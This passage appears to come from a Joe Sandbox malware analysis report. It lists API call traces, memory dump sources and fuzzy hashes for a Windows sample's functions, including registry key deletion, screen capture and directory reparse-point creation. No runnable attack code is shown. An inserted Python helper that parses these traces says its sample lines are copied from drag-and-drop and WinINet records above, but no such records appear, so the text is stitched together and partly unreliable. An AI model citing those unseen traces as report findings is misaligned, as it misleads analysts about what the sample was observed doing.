• Opcode Fuzzy Hash: f52a8fb083119685ca3ba0435197a45932cfc9ef00e702c466bbdea13a81bac6
• Instruction Fuzzy Hash: C5514AB1540308BFDB21DFA4CD88AAB7BBCFF08765F00441AF946A6610DB34E945DB60
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00A58592
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585A2
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585AD
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585BA
• GlobalLock.KERNEL32(00000000), ref: 00A585C8
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585D7
• GlobalUnlock.KERNEL32(00000000), ref: 00A585E0
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585E7
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00A585F8
• OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00A5FC38,?), ref: 00A58611
• GlobalFree.KERNEL32(00000000), ref: 00A58621
• GetObjectW.GDI32(?,00000018,?), ref: 00A58641
• CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00A58671
• DeleteObject.GDI32(?), ref: 00A58699
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A586AF
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: d4342909890c7d7a131994673ff055d6cde5b1c88c86fa934c27ada374efd2a6
• Instruction ID: 522a1798ad7263413b606fdccbc193f0e60ff1178dac15a87f882fa9cc89a48b
• Opcode Fuzzy Hash: d4342909890c7d7a131994673ff055d6cde5b1c88c86fa934c27ada374efd2a6
• Instruction Fuzzy Hash: 3241E875600308BFDB11DFA5DC48EAE7BB8FB89722F104158F906EB260DB349946DB60
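The API lists in the drag-and-drop, WinINet and OleLoadPicture records above give raw call traces but leave the numeric arguments undecoded. The following is an added triage helper, written for this edit and not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses the report's `• Api.MODULE(args), ref: ADDR` lines into structured records, resolves the constants whose meaning is fixed by the Win32 API (the `uMsg` of `SendMessageW`/`DefDlgProcW`, the option ID of `InternetSetOptionW`/`InternetQueryOptionW`, the info level of `HttpQueryInfoW`), and checks whether the full WinINet request chain is present. The sample input is a constructed subset of the call lines copied from the records above; the constant tables cover only the values that appear on this page, and `?` arguments are kept as unresolved (`None`).

```python
import re
from dataclasses import dataclass

# Constructed sample: API lines copied from three of the report's records
# (subcall lines and the "Part of subcall function" entries are omitted).
SAMPLE = """\
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A591B0
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A591BB
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A59225
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A59371
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A3C4B0
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A3C4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A3C533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A3C549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A3C554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A3C584
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A586AF
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: ADDRESS"
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # int for hex literals, None for '?', str for symbolic args
    ref: int     # address of the call site

def parse_arg(tok):
    tok = tok.strip()
    if tok in ("", "?"):
        return None          # Joe Sandbox could not resolve the value
    try:
        return int(tok, 16)
    except ValueError:
        return tok           # e.g. a string literal such as 'advapi32.dll'

def parse_record(text):
    """Parse the API lines of one function record; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m.group("args").split(",")]
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

# Constant tables limited to the values seen in this report (Win32 definitions).
WINDOW_MESSAGES = {0x00B0: "EM_GETSEL", 0x00B1: "EM_SETSEL", 0x00C2: "EM_REPLACESEL",
                   0x0172: "STM_SETIMAGE", 0x0233: "WM_DROPFILES"}
INTERNET_OPTIONS = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {0x05: "HTTP_QUERY_CONTENT_LENGTH"}

# Which 0-based argument of each API carries a decodable constant.
CONST_ARG = {
    "SendMessageW": (1, WINDOW_MESSAGES),
    "SendMessageTimeoutW": (1, WINDOW_MESSAGES),
    "DefDlgProcW": (1, WINDOW_MESSAGES),
    "InternetSetOptionW": (1, INTERNET_OPTIONS),
    "InternetQueryOptionW": (1, INTERNET_OPTIONS),
    "HttpQueryInfoW": (1, HTTP_QUERY),
}

def decode_constant(call):
    """Symbolic name for the call's constant argument, or None if unknown/unresolved."""
    spec = CONST_ARG.get(call.api)
    if spec is None:
        return None
    idx, table = spec
    if idx >= len(call.args) or not isinstance(call.args[idx], int):
        return None
    value = call.args[idx]
    if call.api == "HttpQueryInfoW":
        value &= 0x0FFFFFFF      # drop HTTP_QUERY_FLAG_* modifier bits (high nibble)
    return table.get(value)

HTTP_CHAIN = ["InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW", "HttpQueryInfoW"]

def has_subsequence(calls, chain):
    """True if the APIs in `chain` occur in that order (not necessarily adjacent)."""
    it = iter(c.api for c in calls)
    return all(any(api == want for api in it) for want in chain)

def summarize(text):
    calls = parse_record(text)
    decoded = {f"{c.api}@{c.ref:08X}": decode_constant(c) for c in calls}
    return {
        "calls": calls,
        "decoded": {k: v for k, v in decoded.items() if v},
        "wininet_request_chain": has_subsequence(calls, HTTP_CHAIN),
    }

if __name__ == "__main__":
    result = summarize(SAMPLE)
    for site, name in result["decoded"].items():
        print(f"{site}: {name}")
    print("full WinINet request chain:", result["wininet_request_chain"])
```

The third argument of `InternetSetOptionW` is a pointer to the option buffer, so the `00000100` shown in the record is not decoded here: whether Joe Sandbox printed the pointer or the dereferenced value is not stated on the page, and the helper deliberately only names constants that are passed by value.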
APIs
• VariantInit.OLEAUT32(00000000), ref: 00A31502
• VariantCopy.OLEAUT32(?,?), ref: 00A3150B
• VariantClear.OLEAUT32(?), ref: 00A31517
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A315FB
• VarR8FromDec.OLEAUT32(?,?), ref: 00A31657
• VariantInit.OLEAUT32(?), ref: 00A31708
• SysFreeString.OLEAUT32(?), ref: 00A3178C
• VariantClear.OLEAUT32(?), ref: 00A317D8
• VariantClear.OLEAUT32(?), ref: 00A317E7
• VariantInit.OLEAUT32(00000000), ref: 00A31823
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
• Opcode ID: 7caaf15f7e6b5e1611f087d9a3c10bccd6d29333a5a523a96f334aa357802a40
• Instruction ID: e3bafa55b712f4ddecfc795ea0c52d4d607133dfa4a6af15130f7cba1b8a7a4a
• Opcode Fuzzy Hash: 7caaf15f7e6b5e1611f087d9a3c10bccd6d29333a5a523a96f334aa357802a40
• Instruction Fuzzy Hash: 1AD1F271A00215EFDB10EFA5E889B7DB7B5BF84700F14845AF846AB680DB30ED45DB62
APIs
  • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
  • Part of subcall function 00A4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A4B6AE,?,?), ref: 00A4C9B5
  • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4C9F1
  • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA68
  • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4B6F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A4B772
• RegDeleteValueW.ADVAPI32(?,?), ref: 00A4B80A
• RegCloseKey.ADVAPI32(?), ref: 00A4B87E
• RegCloseKey.ADVAPI32(?), ref: 00A4B89C
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A4B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A4B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00A4B922
• FreeLibrary.KERNEL32(00000000), ref: 00A4B983
• RegCloseKey.ADVAPI32(00000000), ref: 00A4B994
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: 76cb0251cd8a108774d38074004cf447206e8cf71960a1f6dfb798d1a53b7659
• Instruction ID: bc367b7d4fb45e43d455916410a2553fa24ecf672409969db090de09fb81ec8e
• Opcode Fuzzy Hash: 76cb0251cd8a108774d38074004cf447206e8cf71960a1f6dfb798d1a53b7659
• Instruction Fuzzy Hash: B3C17D34618201AFD714DF24C495F2ABBE5BFC4318F14855CF49A8B2A2CB75ED46CBA2
APIs
• GetDC.USER32(00000000), ref: 00A425D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A425E8
• CreateCompatibleDC.GDI32(?), ref: 00A425F4
• SelectObject.GDI32(00000000,?), ref: 00A42601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A4266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A426AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A426D0
• SelectObject.GDI32(?,?), ref: 00A426D8
• DeleteObject.GDI32(?), ref: 00A426E1
• DeleteDC.GDI32(?), ref: 00A426E8
• ReleaseDC.USER32(00000000,?), ref: 00A426F3
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 962cac00f6a21f205a2e3e72e22b120bccdb5088750a4bd8803ed5b509ae8e61
• Instruction ID: ef6cbbe1b229dccf9a3fc9c2d7696391cd313243df2d5b4a519eb311b279ff39
• Opcode Fuzzy Hash: 962cac00f6a21f205a2e3e72e22b120bccdb5088750a4bd8803ed5b509ae8e61
• Instruction Fuzzy Hash: 0261D175D00219EFCF14CFE8D984AAEBBB5FF48310F208529E956A7250E770A951CF64
APIs
• ___free_lconv_mon.LIBCMT ref: 009FDAA1
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD659
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD66B
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD67D
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD68F
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6A1
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6B3
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6C5
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6D7
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6E9
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6FB
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD70D
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD71F
  • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD731
• _free.LIBCMT ref: 009FDA96
  • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
  • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
• _free.LIBCMT ref: 009FDAB8
• _free.LIBCMT ref: 009FDACD
• _free.LIBCMT ref: 009FDAD8
• _free.LIBCMT ref: 009FDAFA
• _free.LIBCMT ref: 009FDB0D
• _free.LIBCMT ref: 009FDB1B
• _free.LIBCMT ref: 009FDB26
• _free.LIBCMT ref: 009FDB5E
• _free.LIBCMT ref: 009FDB65
• _free.LIBCMT ref: 009FDB82
• _free.LIBCMT ref: 009FDB9A
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 9ef609beac75fac2c989c299e2ba2b29606bcd31b3248c22417f591ebf266eb7
• Instruction ID: ae66c3670022219bd06e6851a396f0a3feec487c6a13d69f88e477d786d6f4eb
• Opcode Fuzzy Hash: 9ef609beac75fac2c989c299e2ba2b29606bcd31b3248c22417f591ebf266eb7
• Instruction Fuzzy Hash: A231583164520E9FEB22AF38E945B7AB7EEFF40321F114529E648D7191DB71EC808B24
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00A2369C
                                                                      • _wcslen.LIBCMT ref: 00A236A7
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A23797
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00A2380C
                                                                      • GetDlgCtrlID.USER32(?), ref: 00A2385D
                                                                      • GetWindowRect.USER32(?,?), ref: 00A23882
                                                                      • GetParent.USER32(?), ref: 00A238A0
                                                                      • ScreenToClient.USER32(00000000), ref: 00A238A7
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00A23921
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00A2395D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                      • String ID: %s%u
                                                                      • API String ID: 4010501982-679674701
                                                                      • Opcode ID: e529c446bc74db7a9c8ffbd893dde0755e4455de0b7f9e5427356610e05de952
                                                                      • Instruction ID: efc2fde7ddfea340dd9dcc5abb149071e9922f1092532849ba5e5c58a89131a2
                                                                      • Opcode Fuzzy Hash: e529c446bc74db7a9c8ffbd893dde0755e4455de0b7f9e5427356610e05de952
                                                                      • Instruction Fuzzy Hash: 5F91F572200316AFDB09DF68D894FAAF7E9FF46310F004529F999C6190DB34EA46CB91
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00A24994
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00A249DA
                                                                      • _wcslen.LIBCMT ref: 00A249EB
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00A249F7
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00A24A2C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00A24A64
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00A24A9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00A24AE6
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00A24B20
                                                                      • GetWindowRect.USER32(?,?), ref: 00A24B8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 1311036022-1241985126
                                                                      • Opcode ID: a3c00c1c6862942d300c95cb1bc97636049fe31284c2c607b2ead21a1941a6de
                                                                      • Instruction ID: 47aa791ac01c8440910453e3e30f457e3dbd6ed521b3c10de2b690f505259407
                                                                      • Opcode Fuzzy Hash: a3c00c1c6862942d300c95cb1bc97636049fe31284c2c607b2ead21a1941a6de
                                                                      • Instruction Fuzzy Hash: 9391CE710043159FDB04DF18E985BAA7BE8FF88354F048479FD859A196EB30EE45CBA1
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A58D5A
                                                                      • GetFocus.USER32 ref: 00A58D6A
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00A58D75
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00A58E1D
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A58ECF
                                                                      • GetMenuItemCount.USER32(?), ref: 00A58EEC
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00A58EFC
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A58F2E
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A58F70
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A58FA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1026556194-4108050209
                                                                      • Opcode ID: e6715ba01ca97f926dc375b02096e306c27b95aa1a69bc4b705d457813318d1f
                                                                      • Instruction ID: 98ba618b8657c8cad234dfcef34e0b8207f6cbb9818b1dd416621c180ce5a14f
                                                                      • Opcode Fuzzy Hash: e6715ba01ca97f926dc375b02096e306c27b95aa1a69bc4b705d457813318d1f
                                                                      • Instruction Fuzzy Hash: 8E81AF71508301AFDB10CF24C885AAB7BF9FB88755F04091AFD85A7291DB78DD09CBA1
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A2DC20
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A2DC46
                                                                      • _wcslen.LIBCMT ref: 00A2DC50
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00A2DCA0
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A2DCBC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 1939486746-1459072770
                                                                      • Opcode ID: 40a52490761f9c9f813a4001aa80b760b0c611ee188a3d401acfcb743e0e661e
                                                                      • Instruction ID: 5f7a4f01e90f5e777053c3d3acc8b54c058e402cf1694a707719b410b0246079
                                                                      • Opcode Fuzzy Hash: 40a52490761f9c9f813a4001aa80b760b0c611ee188a3d401acfcb743e0e661e
                                                                      • Instruction Fuzzy Hash: 894113329403107AEB01B775AC07FBF37ACEF85721F10446AF905A6283EB719E0187A5
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A4CC64
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A4CC8D
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A4CD48
                                                                        • Part of subcall function 00A4CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A4CCAA
                                                                        • Part of subcall function 00A4CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A4CCBD
                                                                        • Part of subcall function 00A4CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A4CCCF
                                                                        • Part of subcall function 00A4CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A4CD05
                                                                        • Part of subcall function 00A4CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A4CD28
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A4CCF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2734957052-4033151799
                                                                      • Opcode ID: a04c15101ec7698f0962d2e16cda030b761c8566dfe5377bd33a38028728f6ce
                                                                      • Instruction ID: deaa6e96e9b3065ac74ee05b94bf1f385f37acf685b1ab8b6e535704b0a5de0b
                                                                      • Opcode Fuzzy Hash: a04c15101ec7698f0962d2e16cda030b761c8566dfe5377bd33a38028728f6ce
                                                                      • Instruction Fuzzy Hash: A4318075902229BFD760DB90DC88EFFBB7CFF45761F000165A909E3154DB349A46DAA0
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A33D40
                                                                      • _wcslen.LIBCMT ref: 00A33D6D
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A33D9D
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A33DBE
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00A33DCE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A33E55
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A33E60
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A33E6B
                                                                      Strings
                                                                      Memory Dump Source
